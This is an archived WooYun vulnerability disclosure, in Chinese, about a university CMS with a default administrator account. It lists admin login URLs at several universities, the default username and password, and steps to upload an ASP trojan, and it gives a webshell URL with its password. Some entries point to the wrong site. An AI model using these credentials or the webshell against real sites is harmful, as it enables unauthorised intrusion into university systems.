当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-088978

漏洞标题:多个大学cms存在默认管理员账号,成功getshell

相关厂商:gsgd.jnu.edu.cn

漏洞作者: 路人甲

提交时间:2015-03-04 11:31

修复时间:2015-04-18 11:32

公开时间:2015-04-18 11:32

漏洞类型:账户体系控制不严

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-04: 细节已通知厂商并且等待厂商处理中
2015-03-04: 厂商已经确认,细节仅向厂商公开
2015-03-14: 细节向核心白帽子及相关领域专家公开
2015-03-24: 细节向普通白帽子公开
2015-04-03: 细节向实习白帽子公开
2015-04-18: 细节向公众公开

简要描述:

几十个大学网站存在一样漏洞 我该刷rank么????

详细说明:

暨南大学:
上次爆出的任意注册管理漏洞中,下载了几个数据库,发现都有默认的超级管理员,所以又来提交了。

3.png


后台地址
http://gsgd.jnu.edu.cn/admin/login.asp
账号 ltpower
密码 lt16580
添加asp上传类型

1.png


上传asp木马
http://gsgd.jnu.edu.cn/admin/Lt.Add.asp?Action=add&ModeID=1&ClassID=&Channel=Default

2.png


一句话 http://gsgd.jnu.edu.cn/upfiles/20141227/20141227195016771677.asp 密码chopper

漏洞证明:

广州大学:
http://fxsx.gzhu.edu.cn//admin/login.asp
账号 ltpower
密码 lt16580
暨南大学:
http://zybj.jnu.edu.cn/admin/login.asp
账号 ltpower
密码 lt16580
厦门理工学院:
http://etc.xmut.edu.cn/admin/login.asp
账号 ltpower
密码 lt16580
广东工业大学:
http://tmjtxy.gdut.edu.cn/admin/login.asp
账号 ltpower
密码 lt16580
广东工业大学:
http://xxgcxy.gdut.edu.cn/admin/login.asp
账号 ltpower
密码 lt16580
河源职业技术学院:
http://gsgd.jnu.edu.cn/admin/login.asp
账号 ltpower
密码 lt16580
东莞理工学院:
http://gsgd.jnu.edu.cn/admin/login.asp
账号 ltpower
密码 lt16580

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-03-04 16:46

厂商回复:

此漏洞并非程序BUG,其诱因主要是由于老师没有及时更改默认的管理员密码。同时也非常感谢此问题的发现者,我们将加倍努力提醒老师尽快更改密码。再次表示感谢!

最新状态:

2015-03-04:已经联系老师,并协助其更新一个复杂度高的密码!

2015-03-10:已经联系名单上的学校,并协助老师更新完密码,同时也协助老师做好后期的安全检查工作。